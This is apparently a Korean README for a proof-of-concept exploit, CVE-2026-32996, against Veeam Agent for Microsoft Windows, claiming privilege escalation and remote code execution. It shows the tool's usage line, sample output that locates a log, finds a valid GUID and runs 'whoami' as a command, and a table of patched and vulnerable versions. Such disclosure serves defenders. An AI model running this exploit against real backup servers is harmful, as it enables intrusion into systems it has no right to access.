
Veeam Agent for Microsoft Windows의 취약점으로 인해 로컬 권한 상승이 가능합니다.
인증된 도메인 사용자에 의한 Veeam 백업 서버의 원격 코드 실행(RCE).
기술적 세부 사항은 블로그 게시물을 확인하세요.
https://github.com/user-attachments/assets/8a570332-1cf6-4905-9107-8fcb973c9ce7
CVE-2026-32996.exe "whoami > C:\pwned.txt"
[+] Found Svc.VeeamEndpointBackup.log
[*] Searching for valid GUIDs...
[+] Valid GUID found: 9048554a-ec99-4e18-8bc4-edc637e8d8d4
[*] Executing command 'cmd /c whoami > C:\pwned.txt'
[+] Successful!
| Version | Status |
|---|---|
| 13.0.3.1220 | 완전히 패치됨. |
| 13.0.2.1102 and earlier | 취약함. |